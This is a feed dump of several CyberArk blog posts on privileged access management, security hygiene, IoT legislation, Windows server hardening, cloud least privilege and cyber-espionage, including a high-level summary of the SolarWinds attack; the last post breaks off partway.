Successful cybersecurity programs that prioritize compliance and accountability require common objectives among key stakeholders.  Owens suggests forming a group with shared but different responsibilities to drive this sense of shared accountability – bringing together a CISO, a CTO, even representatives from the technology vendor and integrator so that, as he puts it, “everybody goes to bed at night equally concerned about the goals that need to be achieved.”

Equally important, he notes, is working closely with business and IT process owners to understand current workflows and to embed their expertise into the design of new controls. By asking questions like, “Who really needs elevated privileges to access what systems, why are they required, and at what stages of this process?” you may uncover opportunities to not only improve security but also streamline tasks.

For example, says Owens, “When you sit down and have a serious discussion, holding the CTO and people manager accountable for the access, you may find that 2,000 sysadmins who require far-reaching access becomes 900. And you’ve already reduced risk within that organization.”

Stages of the initiative can then be prioritized and implemented more efficiently, driving quick and measurable “wins” that help build confidence, support, and momentum for the next implementation wave.

Team Players

So how does this 360-degree accountability take hold? Owens explains that while there must be a certain sense of “this is how we do things now” rigidity to quell naysayers, true transformation requires a collective effort, iteration, and time. Here are some ways it can start:

  • Coach, don’t demand. Owens likens change management to coaching a team – you work with your players until mapped out plays become second nature, rather than benching those unable to execute immediately. Teams need to understand what they are doing, why they are doing it and the expected outcome – without these key ingredients, you can’t expect to achieve your goals. Remember that people are always impacted by change: never underestimate the significance of the disruption in their environment, and always explain the “why” – the true purpose behind the plays.
  • Lead with empathy and make it personal. For large-scale initiatives, gaining support from critical user groups like IT admins can be challenging as their daily lives will be most impacted. Show empathy but also challenge perceptions by demonstrating how new practices can actually boost efficiency. Emphasizing nonrepudiation also goes a long way in driving support, Owens explains. “Stronger security controls not only protect our organization, they also protect individual users who can be targeted by attackers based on role or perceived levels of privileged access.”
  • Inspire passion and celebrate successes. “Passion is contagious,” Owens says. “If you have passion for what you’re doing, you will spread it to others working around you – from your leadership team to your change champions to your project teams.” Extending that passion and continuously celebrating successes will make everyone feel part of the movement forward. It’s important all stakeholders feel a sense of pride – that ‘they did this’, as opposed to ‘this was done to them.’
  • Communicate often. Owens knows firsthand that it can be difficult for security professionals to successfully “market” what they do. But during times of great organizational change, trumpeting milestones – and communicating challenges – is essential, because it gives security leaders an opportunity to build awareness and trust through transparency and help everyone address and avoid roadblocks. Large-scale programs often surface and remediate unrelated process or security issues – be sure to call those out. Organizations may consider sending out monthly newsletters with program updates or other similar means of consistent communication to keep everyone looped in. At the end of the day, Owens says, “It’s important the organization understands the positive business impact of the initiative – and the collective effort that’s behind the transformation.”
  • Demonstrate leadership. Every change journey will face differing opinions, pushback, and even open defiance. In these scenarios, you’ll have to demonstrate strong, decisive leadership and be ready to make tough calls. Says Owens, “I’ve had a few conversations with executives who have said, ‘That sounds like the right thing to do, but sometimes we don’t get the support from our senior leaders to invoke tough actions.’ This is typically a sign that the program leadership has not been empowered, either because the initiative itself has not received the appropriate amount of recognition and prioritization across the firm, or the program leaders do not have the confidence to assertively escalate issues.”
  • Align your business strategy to risk. Security initiatives should be aligned to the operational risk oversight of your organization. This function should be able to communicate current and emerging risks your initiative aims to address, and how it will achieve defined risk reduction metrics. However, do not “oversell the risk card,” Owens cautions, as this could lead to false expectations and set your program up for failure. “It is best to deliver fact-based risk insights (industry experiences that relate to your existing business processes) as opposed to fear-based prophecy (using generic terms that suggest the firm will suffer cataclysmic failures if your program is not implemented).” That said, helping businesses understand the inherent risk associated with their processes is necessary, and partnering with other control functions in your organization such as HR, legal and compliance teams can help emphasize the importance of the initiative in driving down organizational risk.

According to Owens, what it boils down to is that companies have gotten so used to terms like “disruption” and “buy-in” that they don’t see how ill-fitting they’ve become. When a “disruptor” has to go level by level in a company and ask for “buy-in,” it makes one side seem like they’re bulldozing through established workflows regardless of their effectiveness, and it gives the other the illusion that they have the option to bow out. That leads to stagnation, inefficiency and confusion. Instead, companies need to preach that shared effort and shared accountability don’t just lead to change for change’s sake.

It leads to evolution.

]]>
Get Back to the Basics with Your Company’s Cybersecurity Practices https://www.cyberark.com/blog/get-back-to-the-basics-with-your-companys-cybersecurity-practices/ Tue, 09 Feb 2021 14:00:12 +0000 https://www.cyberark.com/?p=112571 Cybersecurity Best Practices

Basic hygiene best practices go beyond hand washing – even if you’re doing lots of that these days. The same hygiene concept extends into the digital world of cybersecurity. In an age of near-constant attacks, organizations can’t afford to get caught with “dirt under their fingernails.” And yet, lax or risky practices persist in many companies.

Let’s get back to the basics, revisiting fundamental “cybersecurity hygiene” best practices – across people, process and technology areas – to help mitigate the risk of cyber infection, enable the business, and boost overall security health.

Take a good look at your people. People are an organization’s greatest asset, however, at the hands of motivated attackers, they can also become the weakest link. Numerous social engineering and phishing techniques allow attackers to target individuals with access to valuable systems and data and attempt to steal their credentials. Historically, their “prey” was IT admins and top-level executives with privileged access to every corner of an organization. But in today’s digital, cloud-based, and largely virtual work environments, a new population of “big phish” is emerging. And it’s not necessarily who you’d expect.

Recent attacks on researchers and even third-party transportation providers involved in COVID-19 vaccine development and distribution are evidence of this. As another example, some companies are adopting tools to measure remote worker productivity. Privacy concerns notwithstanding, this creates new treasure troves of highly sensitive data that may be accessed by HR, legal, and other non-technical teams. All of these individuals can now be considered privileged users, and as such, they’re attractive targets for attackers.

Get serious about cybersecurity awareness training. According to recent CyberArk research, nearly half of employees haven’t received remote work-specific cybersecurity training. This means those newly privileged users – along with many other employees and third-party vendors – may not be prepared for a well-crafted email in their CEO’s name that disguises a malicious PDF attachment. Schedule regular sessions to review cybersecurity best practices like never clicking on links or opening attachments before verifying the sender, using strong, unique passwords, following processes to guard privileged accounts and more.

Conduct an ethical phishing exercise. Send out a series of realistic emails and see how many employees take the bait by clicking on attachments or links. Even better, launch a targeted spear-phishing simulation geared toward privileged users – and use the results in subsequent training to help ensure these power users don’t fall for the phish. Also consider third-party Red Team penetration testing exercises to help identify hidden vulnerabilities and attack vectors.

Revisit your corporate device policy. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently warned of increasing attacks on remote workers’ devices via phishing, brute force login attempts, and other methods to gain access to corporate cloud resources. The agency offered a number of strong recommendations for bolstering cloud security, such as implementing conditional access, enforcing strong privileged access management (PAM) controls, and restricting email forwarding – and also suggested prohibiting personal device use altogether. While some organizations may not be ready or able to draw this hard-line, in a time when 69% of remote workers admit to using corporate devices for personal use, every company should review their corporate device policies with a critical eye. As part of this, consider implementing minimum standards and guidelines for strengthening remote workers’ home networks, such as changing default router credentials and using strong WiFi passwords.

Establish a “normal” baseline for network activity. Take advantage of analytics to model baseline behaviors and benchmark risk levels. This will help speed the detection of anomalies and indicators of compromise (IOCs), such as a privileged user who suddenly accesses credentials at an unusual time of day or from an unusual location, demonstrates excessive usage or other abnormal trends.

Clearly define privileged user policies. Administrative privileged accounts and credentials were instrumental in extending the recent SolarWinds supply chain attack to thousands of public and private organizations around the world. To reduce risk, it’s important to clearly define how sysadmins and other highly privileged users should access systems via privileged accounts – and under what conditions, based on the principle of least privilege – and safeguard their privileged credentials from theft and abuse. Make sure HR has policies in place to emphasize IT managers’ responsibility for not only defining the roles of their teams, but also for monitoring and managing privileged activity, and working with IT to enforce security policies. This must be a shared responsibility, not something security teams should shoulder alone.

Implement or strengthen privileged access controls. After you’ve defined your user policies, you need to understand where every privileged account exists in your environments, before you can effectively protect them. This free tool can help. From there, start to implement or strengthen privileged access management controls like enforcing least privilege, regularly rotating privileged credentials, restricting access to Tier0 systems, and monitoring privileged sessions. Based on our team’s experience working with organizations around the world, we’ve put together this list of recommended steps to help roll out quick, effective controls to regain command of privileged access.

Lockdown critical endpoints. As part of a defense-in-depth approach, limit privilege escalation and credential theft by removing local admin rights on servers, VMs, and other critical infrastructure, and implement Identity Security policies that help prevent attackers from moving vertically and laterally to gain administrative access in your environments. This will force attackers to use methods that will expose their presence, so you can detect attacks earlier, respond quickly and prevent attackers from reaching their end goal.

Enable secondary authentication methods. It’s one step that can block a majority of account compromise attacks. Further strengthen your access controls with risk-aware, adaptive multi-factor authentication that leverages user-specific contextual attributes such as location, device and network information to assign risk to each user login attempt and create dynamic access policies. Introducing strong MFA recommendations is also a good best practice to mitigate risk and close up security gaps (i.e. eliminate credential use without MFA).

Review third-party risk management processes. To mitigate risk of supply chain infiltration now is the time to revisit your vendor assessment, onboarding, and ongoing risk management processes and policies. In particular, do you have a strong grasp on each vendor’s own security controls, how they remotely access your environment, and what privileges are granted – and to whom – to access your sensitive enterprise assets and information?

Schedule a security health check. Security isn’t a check-box task – it’s a continuous process, just as regular medical check-ups and dental cleanings are important to maintaining overall hygiene and health. It’s critical to reevaluate existing security controls at a regular cadence to understand where you might have vulnerabilities and take steps to address them to mitigate risk. Now’s the time to schedule a “health check” with your security solution providers to help get, and stay on the right track.

And as you look for ways to improve your organization’s ability to control and monitor privileged activity, visit our Security Fundamentals Guide. You’ll find best practices and specific controls required to appropriately protect your PAM solution deployment, and ultimately, your privileged accounts.

If you’re already a CyberArk customer, our team of experts are available to guide a detailed review of your existing privileged access management infrastructure and provide documented recommendations on areas of improvement and tailored guidance to optimize your environment. To learn more about this important, regular “PAM health check,” read the CyberArk Success Plans Outcome Catalog.

Get back to the basics to regain some control and get on the right path toward improving overall cybersecurity health.

 

]]>
A Step in the Right Direction: The IoT Cybersecurity Improvement Act https://www.cyberark.com/blog/a-step-in-the-right-direction-the-iot-cybersecurity-improvement-act/ Fri, 05 Feb 2021 14:16:32 +0000 https://www.cyberark.com/?p=112480 Internet of Things

A constantly growing network of connected devices – also known as the Internet of Things (IoT) – is expanding the landscape and reach of information technology and enabling digital business transformation. Experts project that by 2030, there will be 24.1 billion active IoT devices, up from 7.6 billion in 2019. But today, a lack of industry-wide cybersecurity standards, a surge in rogue connected devices, and widespread risky remote work habits have created a perfect storm for cyber attacks.

More than half of the IoT devices connecting to corporate networks today are consumer-facing. Companies that manufacture and deploy these devices do their best to secure them, but there is often a lack of adequate levels of protection. As a result, attackers can infiltrate these devices and put sensitive data and systems, and in some cases human safety, at risk. To put this in perspective, a recent Nokia study reveals that IoT device infections skyrocketed by 100% from 2019 to 2020.

While there’s much work to be done to tackle the rampant “IoT insecurity” challenge, U.S. public and private sectors collectively witnessed a step in the right direction with the newly passed Internet of Things Cybersecurity Improvement Act of 2020. Here’s what you should know about the law and how it can help shape and strengthen your organization’s own IoT security approach – regardless of industry.

What is the IoT Cybersecurity Improvement Act of 2020?

The IoT Cybersecurity Improvement Act of 2020 became public law in December 2020. This bit of legislation aims to establish minimum security requirements for IoT devices owned or controlled by the federal government. While it does not include “conventional IT devices such as smartphones and laptops,” the bill’s intentionally broad definition encompasses everything from smart thermostats to hospital beds, critical infrastructure, national arsenals, and more.

The Act acknowledges that IoT devices present a unique set of problems to organizations if not appropriately secured. And while it specifically addresses supply chain security risks to the federal government, as the first bill of its kind to be passed into law, the Act is expected to have far-reaching implications across enterprise and consumer markets.

Here is a high-level look at what’s covered:

  • The National Institute of Standards and Technology (NIST) must now publish standards and guidelines, including minimum information security requirements for managing vulnerable IoT devices that present risk. The Office of Management and Budget (OMB) must then review federal security policies and change them, as necessary, to align with NIST recommendations.
  • The NIST security standards must address four main categories: secure development, identity management, patching, and configuration management.
  • When security vulnerabilities are identified within IoT devices owned or controlled by federal agencies, the responsible contractor or vendor must report and resolve the security vulnerability to increase transparency and help accelerate risk mitigation efforts.

How to Step Up Your Organization’s IoT Security

IoT devices are known to have many firmware and software vulnerabilities that can be accessed via weak credentials. It’s estimated that at least 15% of IoT devices use default credentials that are hardcoded into the device (and have never been changed). This creates a significant opportunity for attackers who target these devices to gain a foothold within networks. They can use these credentials to move laterally, escalate privileges and eventually gain access to an organization’s most critical and sensitive assets.

Today, any connected device can represent privilege risk based on the systems and data it is connected to, and who can access the device. That’s why it’s so important to identify each device and understand how it communicates with other devices, systems, and applications, and which people have access to it. But with so many devices online and so many employees working from home, it’s hard enough for IT and security teams to take inventory of all the IoT devices on their network, let alone ensure they meet enterprise security and compliance requirements.

Automated tools can help make this feasible by continually finding new devices and assessing the network, helping to ensure patches are pushed and weak or default credentials are eliminated. When coupled with a centralized tool that controls privileged access to systems for human and machine users based on a Zero Trust framework, organizations can enforce consistent security and compliance policies and better manage IoT devices across their lifecycles.

CyberArk’s integration with Forescout and Phosphorus empowers organizations to reduce IoT risk by driving greater visibility and shrinking the attackable surface. The three solutions work harmoniously to provide IoT security rigor with continuous detection, management and monitoring of IoT devices and their credentials. This pre-built integrated solution makes life easier for IT and security practitioners focused on strengthening IoT security within their organizations while helping federal agencies and partners to meet the mandates of the IoT Cybersecurity Improvement Act of 2020 across critical identity management, patching and configuration management domains.

]]>
5 Ways to Secure Your Windows Servers and Detect Advanced Threats Faster https://www.cyberark.com/blog/5-ways-to-secure-your-windows-servers-and-detect-advanced-threats-faster/ Tue, 02 Feb 2021 15:15:07 +0000 https://www.cyberark.com/?p=110485 PAM for Servers and VMs

As details of the recent SolarWinds supply chain attack continue to surface, we’re beginning to understand just how far these motivated attackers went to avoid attention and detection. What’s clear is that privileged access was key to gaining, and maintaining, persistence in their victims’ networks.

Advanced Persistent Threats Require Privileges to Remain Under the Radar

To initiate the attack chain, the SolarWinds attackers reportedly planted backdoor code, then delivered it to SolarWinds Orion users via a Trojanized software version update. By building in an intentional “dormant period” of up to 14 days, the attackers were able to cover their tracks, making it difficult for victim organizations to correlate their actions with other malicious activity. From there, the malicious code began searching for tools and processes within the environment that could either raise red flags (such as advanced threat monitoring capabilities) or open doors (such as security solutions that could be tampered with or disabled).

From there, the attackers used a variety of credential-harvesting methods to steal identities and credentials from authorized users, then searched for privileged account credentials to unlock access to systems, infrastructure and software. They escalated these privileges to reach higher value targets such as Windows servers until they reached their end goal. In many attack sequences, this “ultimate target” is the Domain Controller – the central authority of trust within Windows environments.

But perhaps the SolarWinds attackers’ stealthiest move was the “Golden SAML” – an Active Directory Federation Services (ADFS) bypass technique first identified by CyberArk Labs in 2017 but never seen in the wild until this attack. After gaining privileged access to a victim’s network, the attackers stole a SAML token signing certificate, allowing them to forge a valid SAML token and bypass MFA completely to gain unauthorized access to both the victim’s on-premises and cloud assets. The attackers likely understood that SAML token signing certificates are almost never changed, meaning they could persist in the network, undetected, for long periods of time.

Secure Your Windows Environments with Privileged Access Management

Even the strongest, most sophisticated defenses are not always enough to stave off highly targeted attacks, so it’s necessary to “assume breach” and take steps to protect high-value assets, detect threats earlier and reduce risk. Doing this effectively requires multiple layers of security, such as endpoint protection, detection and response technology, and strong privileged access management, and often happens in phases.

Given the quantity of Windows desktops, laptops, servers and virtual machines (VMs) deployed today, securing your Windows environment may be a natural place to start. Here’s how:

1. Take inventory of your local admin accounts. In theory, privileges are limited to user roles within the business. For example, a database admin (DBA) is granted privileges to log onto a Windows server to control and manage the SQL – and that’s it. Or, a designated Windows server is permitted to only run a specific web-server application – and nothing else. But in reality, it’s common for Windows admins to grant local admin privileges to human and machine users in the name of convenience. This can spiral out of control quickly, making it difficult to trace who or what has access to which systems, when, and for what reason. As new machines are rapidly deployed in virtual environments, manually tracking every local admin account becomes virtually impossible. Take advantage of tools that help you automate this inventory process and make it manageable.

2. Stop sharing local admin accounts. These powerful accounts are used by IT staff to perform maintenance on workstations, servers, databases and more. Often, the same privileged account credentials are shared by multiple admins across an entire platform or organization – making them an easy target. With local admin rights, malicious insiders or external attackers can access additional privileged credentials, traverse the network and take over Windows workstations, servers, macOS machines, and other critical infrastructure. Strong privileged access controls like randomizing, regularly rotating, and carefully managing these “all-access passes” are a must.

3. Better yet – get rid of your local admin accounts altogether. Removing local admin rights from Windows servers and machines can dramatically reduce the risk of credential theft and ransomware infection – but it has to be done without hindering user productivity or complicating operations. A balanced approach enforces consistent least privilege policies and automates temporary privileged access elevation when end-users need it to perform required tasks. Also consider implementing just-in-time access so admins can log onto systems when needed, and for specific periods of time.

4. Identify all types of admin accounts and limit usage. Restricting access shouldn’t end with your local admin accounts. Other privileged admin accounts such as service accounts, application accounts, and privileged data user accounts must be identified, secured, and managed to maximize risk reduction.

5. Keep your software current. Regularly applying software patches on servers and machines is integral to a defense-in-depth strategy, as are routine updates to server control panels, content management systems, and plug-ins. Also remove or turn off unnecessary services – the fewer things you have running on a system, the better.

Mitigate the Risk of Targeted Attacks with New CyberArk Features

CyberArk offers a comprehensive set of security capabilities to protect privileged access to Windows servers and machines both on-premises and in the cloud. To help organizations address existing weaknesses in their environment and protect against future attacks, we’ve introduced two new CyberArk Endpoint Privilege Manager features, which are now available as part of our 30-day free trial:

Credential theft detection and blocking for SolarWinds Orion users. Automatically detect and block attempts to harvest and steal credentials cached by the SolarWinds Orion application that can be used to access cloud services like AWS and Azure or enable remote access to corporate systems. This can help SolarWinds Orion customers to prevent attackers from gaining a foothold for lateral movement.

Duo Integration “Secrets Dump.” Multi-factor authentication (MFA) tools – like all software – need credentials in order to protect the application from unauthorized access. As such, all MFA requires credential protection. Our first policy addresses Duo MFA, which is widely used by administrators and users alike and integrates with popular applications such as Windows device logins and Outlook on the web (OWA). As the Golden SAML technique takes hold, other threat actors may try to steal a credential, aka secret key, stored within the Duo application and abuse it to bypass MFA. With this new rule, organizations can automatically protect against such Duo secret key theft and MFA tampering.

Don’t wait until the aftermath of a targeted attack to shut down the privileged pathway in your Windows environments. Follow these best practices to reduce your risk and regain control – and remember, we’re here to help.

]]>
Banking Cybersecurity Vet: Why Transformation Must Start at the Top https://www.cyberark.com/blog/banking-cybersecurity-vet-why-transformation-must-start-at-the-top/ Fri, 22 Jan 2021 14:16:50 +0000 https://www.cyberark.com/?p=108180

The banking industry spends 40% more on combating cybercrime than any other industry, with a per-firm average of $18.5 million spent on direct costs of incidents annually. When you also consider that cyber attacks on banks went up a whopping 238% during the first few months of the COVID-19 pandemic, you get a very clear sense that this is a top priority problem, and it needs top-down support.

While you’re likely to get agreement on the former, you may be surprised to find less on the latter. Everyone agrees that cybercrime needs to be guarded against, yet they’re not always on the same page as to who’s job that actually is. Part of the problem stems from the idea that it’s, well, just one job. Making it the CISO’s responsibility to go department by department to get “buy-in” on cybersecurity may be an outward show of taking the issue seriously, but in practice, it could actually create unintended weaknesses.

Those attempting to implement new ways of approaching cybersecurity are faced with competing cultural perspectives on technology and competing ideas about how to implement that technology. Left to shoulder the burden of responsibility alone, they can find themselves unable to get smoothly from point A to point B and beyond.

Gerry Owens knows exactly what it takes to change outmoded thinking and implement lasting change. A veteran IT risk management and cybersecurity executive with more than 30 years of experience in the banking industry, Owens has often been the lynchpin at the intersection of organizational transformation, employee engagement, and technology. Currently CEO and Founder of GOTAB IT RISK inc., he works with security and risk leaders to architect and execute successful tech transformations.

We sat down with Gerry to learn why some large-scale initiatives “stick,” while others can’t seem to get off the ground, and how – as a firm believer that privileged access management (PAM) underpins any major cybersecurity strategy – his frontline insights can help organizations navigate their own PAM journeys.

But what logically could have been a technology-focused discussion turned out to be anything but. In fact, we barely talked about that at all.

“I’ve seen many technology implementations struggle,” Owens explains, in a conversation rooted in his career in IT management and his unique experience in the banking industry. Often it is because people didn’t embrace the change as much as you needed them to, whether it is not understanding the significance of the program, alignment to the corporate strategy, or not having a clear direction on priorities. This tends to create an element of dissension – people who didn’t feel that the change was worthwhile, or that it impacted them adversely. And whether they knowingly or unknowingly fostered this negativity, they’re the ones that stood in the path of a successful implementation.”

The short answer, says Owens, is that for implementation to take hold, it has to be something driven by senior executives across the firm with clear communications across all levels, and shared accountability for the outcome. “Organizational change management needs to lead with people,” says Owens.

Gerry Owens on Organizational Transformation

C-Suite Support is an A-Level Priority

Owens bristles at the term “getting buy-in” when discussing the implementation of new technology programs because, quite simply, he doesn’t see programs like privileged access management as anything less than a core priority. He’d also like to do away with the term “technology programs” altogether while he’s at it.

“We need to stop calling them [that] because, as a matter of fact, they’re business transformation programs that tend to disrupt operational processes,” Owens says.

If such programs are not prioritized – and instead seen as somehow optional – they will continue to face challenges to their acceptance and complete adoption all the way down the corporate hierarchy. During his years in the naturally risk-averse banking industry, Owens saw firsthand how important it was for CISOs to have the ear of CEOs and board members. Their understanding of, and appreciation for, the types of risks the firm is exposed to, and the security programs necessary to protect the organization sent a clear message from the top: This is the new way of doing things.

“We have to make it clear: privileged credentials and accounts represent one of the largest attack surfaces for organizations today,” Owens says. “We’re not giving you the rite of passage. We’re telling you, ‘This is going to be your new operating model.’”

Through his consulting work, he’s heard this particular struggle voiced time and again – particularly from organizations in the mid-market. Rather than a strictly mandated course of action directed from above, the onus is on the CISO to make the case to each level of the company directly – some of whom will immediately recognize the importance and some of whom will fail to see the relevance to their particular silo – in a wasteful effort to get everyone onboard rather than an effective push to communicate “this is how things are going to be done now.”

Owens sees only one true way for operational transformation to not only get implemented thoroughly but take hold, grow and thrive – and that’s through transparency from the top down. And this isn’t just “buy-in,” it’s true understanding, he says. “When I’m implementing something so complex that’s touching a whole bunch of business processes, applications, and infrastructure technology, not only does the accountability of who has access become important, but I also need to make sure I’ve got the people at the table that will successfully see the project through its evolution.”

To ensure that security is seen as a shared responsibility throughout an organization rather than one person or group’s “job,” Owens suggests a few key strategies:

  • Make It Urgent, Not Optional. “[Senior executives] need to understand the vulnerable state the organization is in right now – and the consequences that could come as a result of this vulnerability,” he says. The mass – and sudden – shift to remote work in the past year has stretched and tested resources, which is only accelerating the urgency of strong security protocols. The recent SolarWinds breach has torn through government and private organizations alike in what is the latest example of how privileged credentials and accounts remain incredibly vulnerable to attack. There is a need to drive a crises mindset before the crisis occurs.
  • Build Your Case. Create a business-level narrative to show top stakeholders that unprotected privileged access is a security challenge that encompasses every single user, application, and machine identity – and has the power to completely disrupt business. Aligning security with clear business goals, and risk appetite – outlining metrics that define success while also taking into account potential disruptions – will help ensure security isn’t seen as an add-on or some useful tool, but an integral part of growing and maintaining the business.
  • Don’t Go it Alone. To gain momentum for acceptance and implementation, CISOs need to “interface with the right levels of influence within the organization.” For example, Owens encourages them to “talk to your risk group and make sure they understand the importance of the PAM initiative, so they can help escalate to leadership in parallel and drive urgency amongst business decision-makers.” Also bring the people with influence at every level, such as HR, into the fold. They can help drive the message that “security is everyone’s responsibility.”
  • Break Out the Placemat. Your case – and subsequent executive reports – should be able to be made in a single page to ensure it gets read and absorbed. “I call it the placemat,” Owens says. “If we can’t tell some of the most senior executives within the organization how we’re doing and what the situation is, or where they need to help, on one page, we don’t deserve to be in this role.”

Security can only become part of an organization’s DNA when there is, in Owens’ words, “a sense of accountability across the organization that everyone is responsible for security and for the firm’s performance when it comes to privileged access.” When this is communicated clearly and directly from the top, the entire process tends to go much smoother. That’s when organizations realize cybersecurity isn’t a job, it’s an integral part of everything they do – and it’ll only get more important year after year.

]]>
People, Process and Technology: Six Best Practices for Cloud Least Privilege https://www.cyberark.com/blog/people-process-and-technology-six-best-practices-for-cloud-least-privilege/ Fri, 15 Jan 2021 14:21:21 +0000 https://www.cyberark.com/?p=107940 6 Cloud Least Privilege Best Practices

If your company is like most, it rolled out flexible remote work options and dialed up digital transformation last year – all thanks to the cloud. And now, you probably rely on more cloud services and SaaS applications than you ever have before.

Yet as organizations’ cloud usage grows – and increasingly spans across multiple cloud providers – the creation of human, application, and machine identities have accelerated. Mapping relationships between all of these identities and cloud resources has gotten extremely complicated.

A recent ESG survey found that maintaining consistent identity and access management (IAM) controls across public and private clouds is the No. 1 challenge for IT and cybersecurity professionals charged with IAM tasks. Still, achieving a unified approach to IAM is their No. 1 priority, which makes sense, given the onus is on the cloud customer to manage and secure access in their cloud environments, as outlined in the leading cloud providers’ shared responsibility model.

Implementing the principle of least privilege – an essential cybersecurity best practice – is one of five key steps for securing privileged access and identities for cloud-based infrastructure and applications.

In a perfect world, each identity would be configured to have only the privileges and permissions to perform its intended functions – nothing more, nothing less. This is the crux of the principle of least privilege, and a core tenant of Zero Trust. But even the most sophisticated security team will tell you this is easier said than done

Cloud Permission Misconfiguration: A Critical Attack Vector 

Especially at scale, the dynamic nature of cloud roles, infrastructure, applications, and services often leads to misconfigurations that can result in the accumulation of unused permissions. Attackers can exploit these permissions to gain access to critical cloud infrastructure, steal or alter sensitive data or interrupt cloud-hosted services.

Over-permissioned accounts and roles is the top cloud misconfiguration today, according to the same ESG study, and they’ve been traced to some of the largest breaches in history. The 2020 IBM Cost of a Data Breach Study found that 19% of all breaches were caused by misconfigurations of cloud servers and virtual machines (VMs) – and they’re costlier than other breach types at $4.41M on average.

Six Steps to Implementing Cloud Least Privilege

It’s clear that least privilege must become a cloud IAM priority. Here are six best practices for reducing risk and driving change across people, processes, and technology to get there:

1. Get everyone on the same page. Research from CyberArk and the Cloud Security Alliance shows responsibility for cloud IAM design and operations varies notably between organizations. Stakeholders should align to identify which teams and individuals will “own” the implementation of least privilege strategies – and ensure these responsibilities are clearly understood.

2. Don’t make security decisions in a vacuum. Consult cloud architects and developer teams on all process and technology decisions at the start of the program and throughout the implementation. This helps to maximize buy-in from key stakeholders and increase long-term effectiveness.

3. Map all existing IAM permissions. Organizations can’t defend against threats they aren’t aware of. First, identify and visualize all IAM permissions across cloud provider environments and Kubernetes services. Then, map access relationships between identities and resources to uncover potential vulnerabilities.

4. Remediate unused and risky entitlements. Excessive permissions for human, machine, and application identities should be removed immediately. AI-powered recommendations can speed and simplify this process, and the most effective solutions can also uncover hidden, platform-specific risks like Shadow Admins. If you’re taking a phased approach, start by eliminating excessive privileges to your most valuable cloud assets – then apply least privilege policies more broadly over time.

5. Make bare minimum permissions the default for new workloads: AWS is especially clear on this point, advising organizations to “Start with a minimum set of permissions and grant additional permissions as necessary. Doing so is more secure than starting with permissions that are too lenient and then trying to tighten them later.”

6. Consistently measure and verify least privilege. Least privilege doesn’t last forever. Structuring consistent, periodic reviews to clean up unused permissions that accumulate over time is essential to combatting permission creep. Quantify risk reduction over time with analytics-based assessments for each unique environment.

Consistent Controls are Key for Scalable Security

Today, you’re likely utilizing capabilities from multiple cloud providers for cost savings, increased availability or unique technical features. And configuring the countless combinations of user to application access – for any time and from any place or device – is a real challenge. Add in the complexity of DevOps tools, increased automation and multiple on-premises data centers, and things get even more… cloudy. Cracking the code requires a unified approach.

The most effective strategies employ centralized, consistent IAM and privileged access management (PAM) controls that enable least privilege for all identities linked to resources – from cloud management consoles to SaaS applications – across hybrid and multi-cloud environments. It’s also important to layer these controls with single sign-on and context-based multi-factor authentication (both also protected by PAM) to further secure access to cloud environments.

Whether you’re focused on securing an initial project in a hybrid environment or fully embracing cloud native applications today, a consistent approach is the key to mastering privileged and identity access management in the cloud.

If you’re interested in further exploring strategies to implement and measure cloud least privilege, check out our free trial of CyberArk Cloud Entitlements Manager, an AI-powered SaaS solution that removes excessive permissions across your cloud estate.

Editor’s Note: This is the final post in a series on securing privileged access and identities in the cloud. Explore these previous posts:

]]>
Breach of Trust: How Cyber-Espionage Thrives On Human Nature https://www.cyberark.com/blog/breach-of-trust-how-cyber-espionage-thrives-on-human-nature/ Tue, 12 Jan 2021 13:39:22 +0000 https://www.cyberark.com/?p=107559 Cyber-espionage Thrives on Human Nauture

With so much of daily life tethered to digital communication and most of our important information residing in data clouds, we’ve all got a lot riding in this virtual atmosphere. So naturally, the seemingly endless stream of cyber attack reports put everyone on edge. And Hollywood film scripts contribute to our collective tension, creating a shadowy underworld rampant with “cyber-espionage” and high-tech, sophisticated criminals cracking codes and infiltrating impenetrable defenses.

But like a lot of things that influence perceptions via movies and television, the reality is much more mundane. And that, in some ways, maybe even scarier.

“[Cyber-espionage] is not something that is very dramatic, you know?” explains CyberArk Labs lead security researcher Lavi Lazarovitz, a 12-year veteran of the Israeli Air Force and Israeli Intelligence Corp who helped build and expand CyberArk’s security team since joining six years ago. “If you had a camera inside the headquarters of the threat actors, you’d just see a lot of people connecting with basic desktop protocols, just querying data. It’s not dramatic. But what happens on the other side of it is dramatic.”

A distinct lack of drama on the surface is largely what fuels the success of cyber attacks. Verizon recently released its first-ever Cyber-Espionage Report, a deeper dive into the evolving landscape of cyber attacks that build off of its annual Data Breach Investigations Report (DBIR). While both reports found similar, and perhaps not surprising, stats such as the fact that 86% of data breaches were for financial gain, and that more than half (56%) of the time, threat actors are going after credentials to gain a foothold and unlock critical assets. But where the Cyber-Espionage Report goes a little deeper is into the ways in which cyber attacks thrive less on shadowy quick strikes at specific targets, and more on slow, quiet infiltration buttressed by very personal and seemingly normal direct contact with their victims. Add to that simple human error, and you have situations that open up more vulnerabilities that can potentially create even more damage than ransomware and other malware-based attacks.

All Hands on Deck

Threat actors thrive on periods of fluctuation and transition, and the past year has seen an abundance of both as organizations and employees have had to make radical adjustments to where and how they work with little to no preparation. But even prior to the emergency mass adoption of remote work and the added burden – and importance – of privileged access management (PAM), Lazarovitz and his team have seen security become less the domain of specialized experts and more a collective responsibility.

“There are a lot of advantages and disadvantages to the fact that security is not only the business of the security guys,” says Lazarovitz. “Engineers, developers – they now have their hands in a lot of sensitive material. All along here there is sensitive access and secrets and identities that need to be protected.”

Lazarovitz points out that there are benefits to having security concerns as a frequent touchpoint along the production pipeline, too. “It brings more firepower to security. Now security is integrated into each part of the development pipeline. But because many of the developers and stakeholders, in general, are not proficient or skilled enough to manage or configure security, most of the breaches we see are simply based on misconfiguration and mistakes. A misconfigured access to servers, an open firewall…all of these are now managed by a lot of stakeholders, and mistakes are bound to happen.”

The GIF Offensive

Perhaps the most shocking revelation in the Verizon reports is just how much human contact is behind a large portion of cyber attacks. The top three methods – accounting for 67% of all breaches – are phishing/social attacks, human error, and credential theft (which is often the result of No. 1). Lazarovitz puts it in advertising terms, comparing the actions of threat actors to a brand’s “conversion rate” – the more customers they contact, the more likely they are to make a figurative sale. “Personal interaction is something that is known to be very, very effective,” he says. “Social engineering is the leading attack vector when it comes to opportunistic attackers and nation-states – all of them rely on social engineering.”

By now, most people are aware that they shouldn’t open attachments they don’t recognize and most spam filters corral suspicious email addresses, but the recent reliance on remote communication and collaboration applications like Zoom and Microsoft Teams have provided the opportunity for phishing attacks to become more targeted, manipulative and subtle.

Even a friendly-seeming GIF can be a foothold for a threat actor.

